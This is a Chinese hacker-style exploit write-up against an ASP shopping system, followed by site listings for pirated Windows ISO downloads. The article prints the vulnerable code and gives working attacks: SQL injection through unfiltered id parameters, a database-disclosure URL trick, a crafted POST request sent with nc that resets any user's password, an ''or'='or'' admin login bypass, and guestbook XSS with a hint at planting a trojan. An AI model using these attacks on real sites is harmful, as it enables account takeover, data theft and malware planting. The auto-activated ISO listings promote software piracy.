霸王背后的脆弱——完全解剖雷霆购物系统
一、SQL注入漏洞
我们先来看看vpro.asp文件的部分漏洞代码:
<%
dim id
id=request.QueryString("id")
dim prename,company,intro,predate,graph2,description,remarks,price
set rs=server.CreateObject("adodb.recordset")
rs.open "select * from product where id="&id,conn,1,3
rs("viewnum")=rs("viewnum") 1
rs.update
%>
sub.asp文件的漏洞代码:
sortsid=request.querystring("nid")
if Not isempty(request("page")) then
else
end if
set rs=server.CreateObject("adodb.recordset")
rs.open "select pagenum,name,mark,vipprice,discount,score,id,author,productdate,price2,price1,discount,pic from product where sortsid=
"&sortsid&" order by adddate desc",conn,1,1
还有rank.asp文件的漏洞代码:
dim id,action
action=request.QueryString("action")
id=request.QueryString("id")
set rs=server.CreateObject("adodb.recordset")
rs.open "select id,name,rank,ranknum from product where id="&id,conn,1,3
参数全都没有做过滤,用普通的注入工具就能轻松注入。
Search.asp这个文件我开始还以为是搜索页面,但是当我细读代码后,发现原来reseach.asp才是真正的搜索文件,其中又这样一段代码:
if name<>"" then
end if
if author<>"" then
end if
if manufacturer<>"" then
end if
if code<>"" then
这就是经典的填字游戏!!因为它在高级搜索页面作了javascript过滤,所以我们要用nc提交来进行cookies注入。但我们也可以在快速搜索页面提交:“504%’注入语句’P4”就能注入了,抓包然后把地址放在NBSI里就能注入了,因为我的IIS有点问题,所有就没深入测试。
二、爆库
数据库连接文件conn.asp并没有加入容错语句On Error Resume Next我们随便找一个带参数的地址,如:www.hackerxfiles.net/vpro.asp?id=513,我们就在地址栏里输入:www.hackerxfiles.net\vpro.asp?id=513,看数据库爆出来了吧!
三、cookies欺骗漏洞
Forget.asp是密码找回文件文件,repws.asp是修改密码文件,我们来看看它的部分代码:
<%
if request("username")="" then
response.end
end if
dim tmp
set rs=server.CreateObject("adodb.recordset")
’提交修改密码
if not isempty(request("SubmitRePws")) then
rs.open "select password from [user] where username=’"&trim(request("username"))&"’",conn,1,3
rs("password")=md5(trim(request("password2")))
rs.update
rs.close
call MsgBox("您的密码取回成功,请登录!","GoUrl","login.asp")
response.end
end if
rs.open "select answer from [user] where username=’"&trim(request("username"))&"’ ",conn,1,1
tmp=trim(rs("answer"))
rs.close
if tmp<>md5(request("answer")) then
response.end
end if
set rs=nothing
%>
呵呵,笑了吧!我们现在来构造数据包:
POST /lt/repws.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, /
Referer: http://localhost/lt/repws.asp
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)
Host: localhost
Content-Length: 72
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQGQGQXOO=IFKFCOFAPEOINKPNGDEJEKOF
password=121212&password2=121212&SubmitRePws=提交&username=x-key
修改就把ueername和password、possword2还有Content-Length修改一下就行了,其他的都不用改。我们现在用nc提交:nc localhost 80<1.txt>1.htm,如图3所示,然后我们运行一下1.htm,就会看到图4的消息框了!
四、跨站漏洞
注册文件reg.asp只是在页面表面用了javascript做了过滤,我们可以把它保存到本地,然后删除javascript验证就能注册了呵呵,注册的所有参数都完全没有做过滤哦!!在里面添任何东西都可以,但是这又有什么用呢?那么这就是要看你的工程学了。
我们来看看留言本的login.asp的漏洞代码:sqlchk="select * from admin where admin=’" & Username & "’ and password=’" & password & "’"呵呵,用经典的’or’=’or’就能进入了,但是,页面做了javascript验证,但是这个验证就能阻止我们吗?呵呵,当然不能,绕过javascript验证的方法前面已经讲过了,这里就不重复了!
我们只要先抓包,然后用nc这样提交就行了nc localhost 80<1.txt>1.htm好了,现在我们就可以打开1.htm了!!
我们再来看看write.asp文件,我们打开该页面在“电子邮件”或者“个人主页”中输入跨站代码:"><",就能看到我们想要的效果了!如果我们再勾上“只有斑竹才可以看”,呵呵,挂个马什么的不就……
推荐系统
番茄花园 Windows 10 极速企业版 版本1903 2022年7月(32位) ISO镜像快速下载
语言:中文版系统大小:3.98GB系统类型:Win10番茄花园 Windows 10 32位极速企业版 v2022年7月 一、系统主要特点: 使用微软Win10正式发布的企业TLSB版制作; 安装过程全自动无人值守,无需输入序列号,全自动设置; 安装完成后使用Administrator账户直接登录系统,无需手动设置账号。 安装过程中自动激活
新萝卜家园电脑城专用系统 Windows10 x86 企业版 版本1507 2022年7月(32位) ISO镜像高速下载
语言:中文版系统大小:3.98GB系统类型:Win10新萝卜家园电脑城专用系统 Windows10 x86企业版 2022年7月 一、系统主要特点: 使用微软Win10正式发布的企业TLSB版制作; 安装过程全自动无人值守,无需输入序列号,全自动设置; 安装完成后使用Administrator账户直接登录系统,无需手动设置账号。 安装过程
笔记本&台式机专用系统 Windows10 企业版 版本1903 2022年7月(32位) ISO镜像快速下载
语言:中文版系统大小:3.98GB系统类型:Win10笔记本台式机专用系统 Windows 10 32位企业版 v2022年7月 一、系统主要特点: 使用微软Win10正式发布的企业TLSB版制作; 安装过程全自动无人值守,无需输入序列号,全自动设置; 安装完成后使用Administrator账户直接登录系统,无需手动设置账号。 安装过
笔记本&台式机专用系统 Windows10 企业版 版本1903 2022年7月(64位) 提供下载
语言:中文版系统大小:3.98GB系统类型:Win10笔记本台式机专用系统 Windows10 64专业版 v2022年7月 一、系统主要特点: 使用微软Win10正式发布的专业版制作; 安装过程全自动无人值守,无需输入序列号,全自动设置; 安装完成后使用Administrator账户直接登录系统,无需手动设置账号。 安装过程中自动
雨林木风 Windows10 x64 企业装机版 版本1903 2022年7月(64位) ISO镜像高速下载
语言:中文版系统大小:3.98GB系统类型:Win10新雨林木风 Windows10 x64 企业装机版 2022年7月 一、系统主要特点: 使用微软Win10正式发布的企业TLSB版制作; 安装过程全自动无人值守,无需输入序列号,全自动设置; 安装完成后使用Administrator账户直接登录系统,无需手动设置账号。 安装过程中自动激活
深度技术 Windows 10 x64 企业版 电脑城装机版 版本1903 2022年7月(64位) 高速下载
语言:中文版系统大小:3.98GB系统类型:Win10深度技术 Windows 10 x64 企业TLSB 电脑城装机版2022年7月 一、系统主要特点: 使用微软Win10正式发布的企业TLSB版制作; 安装过程全自动无人值守,无需输入序列号,全自动设置; 安装完成后使用Administrator账户直接登录系统,无需手动设置账号。 安装过程
电脑公司 装机专用系统Windows10 x64 企业版2022年7月(64位) ISO镜像高速下载
语言:中文版系统大小:3.98GB系统类型:Win10电脑公司 装机专用系统 Windows10 x64 企业TLSB版2022年7月一、系统主要特点: 使用微软Win10正式发布的企业TLSB版制作; 安装过程全自动无人值守,无需输入序列号,全自动设置; 安装完成后使用Administrator账户直接登录系统,无需手动设置账号。 安装过
新雨林木风 Windows10 x86 企业装机版2022年7月(32位) ISO镜像高速下载
语言:中文版系统大小:3.15GB系统类型:Win10新雨林木风 Windows10 x86 专业版 2022年7月 一、系统主要特点: 使用微软Win10正式发布的专业版制作; 安装过程全自动无人值守,无需输入序列号,全自动设置; 安装完成后使用Administrator账户直接登录系统,无需手动设置账号。 安装过程中自动激活系统,无
相关文章
- 怎么使用windows通用系统安装器?
- 2020年第三季度的垃圾邮件和网络钓鱼攻击分析
- 如何维护互联网信息安全?安全认证已启动,18款APP进入名单
- 黑客利用Firefox恶意扩展窃取Gmail数据
- 新一波与新冠疫苗相关的攻击
- 什么是网络唤醒功能
- 无线网络安全之隐藏无线路由器提高安全
- Nmap备忘单 从探索到漏洞利用 第四章 绕过防火墙
- 超酷SOHO网络边缘应用新需求
- 如何防御与删除calc.exe病毒
- 电脑出现“0x7c84c3e3”指令引用的“0x6ea000"内存错误的解决办
- 请注意:又有黑客宣布可以破解每部iPhone了
- 代码安全性和健壮性:如何在if和assert中做选择?
- 添加SHIFT后门又一法 学习如何查找后门
热门系统
- 1华硕笔记本&台式机专用系统 GhostWin7 32位正式旗舰版2018年8月(32位)ISO镜像下载
- 2雨林木风 Ghost Win7 SP1 装机版 2020年4月(32位) 提供下载
- 3深度技术 Windows 10 x86 企业版 电脑城装机版2018年10月(32位) ISO镜像免费下载
- 4电脑公司 装机专用系统Windows10 x86喜迎国庆 企业版2020年10月(32位) ISO镜像快速下载
- 5深度技术 Windows 10 x86 企业版 六一节 电脑城装机版 版本1903 2022年6月(32位) ISO镜像免费下载
- 6深度技术 Windows 10 x64 企业版 电脑城装机版2021年1月(64位) 高速下载
- 7新萝卜家园电脑城专用系统 Windows10 x64 企业版2019年10月(64位) ISO镜像免费下载
- 8新萝卜家园 GhostWin7 SP1 最新电脑城极速装机版2018年8月(32位)ISO镜像下载
- 9电脑公司Ghost Win8.1 x32 精选纯净版2022年5月(免激活) ISO镜像高速下载
- 10新萝卜家园Ghost Win8.1 X32 最新纯净版2018年05(自动激活) ISO镜像免费下载
热门文章
- 1重装上阵新赛季有哪些重型武器_重装上阵新赛季重型武器列表
- 2使用win7中本地搜索功能时四个技巧快速找到文件的操作方如何用win7的搜索功能法
- 3天天酷跑布鲁与冰原狼仔哪一个好 布鲁好还是冰原狼仔好
- 4斐讯k1路由器刷Breed BootLoader(不死UBoot)教程
- 5路由器密码忘了怎么办 无线路由器登陆密码忘了解决方法【详解】
- 6战双帕弥什超频晶币极如何获得_战双帕弥什超频晶币极获得方法
- 7如何重装系统(安装系统)win7,本文教您如何迅速重装win7系统
- 8Win8安装Office2013提示出错1402怎样办?
- 9WinXP打印机无法打印提示该文档未能打印怎样办?
- 10windows7专业版原版下载
常用系统
- 1深度技术Ghost Win7 Sp1 电脑城万能装机版2022年7月(32位) ISO高速下载
- 2华硕笔记本&台式机专用系统 GHOSTXPSP3 2018年4月 ISO镜像免费下载
- 3深度技术Ghost Win8.1 x32位 特别纯净版2021年4月(免激活) ISO镜像高速下载
- 4深度技术 Windows 10 x86 企业版 六一节 电脑城装机版 版本1903 2021年6月(32位) ISO镜像免费下载
- 5新萝卜家园 Ghost XP SP3系统 电脑城极速纯净版 2021年9月 ISO镜像高速下载
- 6电脑公司Ghost Win7 Sp1 六一节 装机万能版2020年6月(32位) 提供下载
- 7雨林木风Ghost Win8.1 (X64) 极速纯净版2021年1月免激活) ISO镜像高速下载
- 8电脑公司 装机专用系统Windows10 x86企业版 版本1903 2021年11月(32位) ISO镜像快速下载
- 9雨林木风Ghost Win8.1系统 X64位 最新纯净版2018年09月(免激活)ISO镜像下载
- 10番茄花园Ghost Win8.1 (X32) 纯净版2020年12月(免激活) ISO镜像免费下载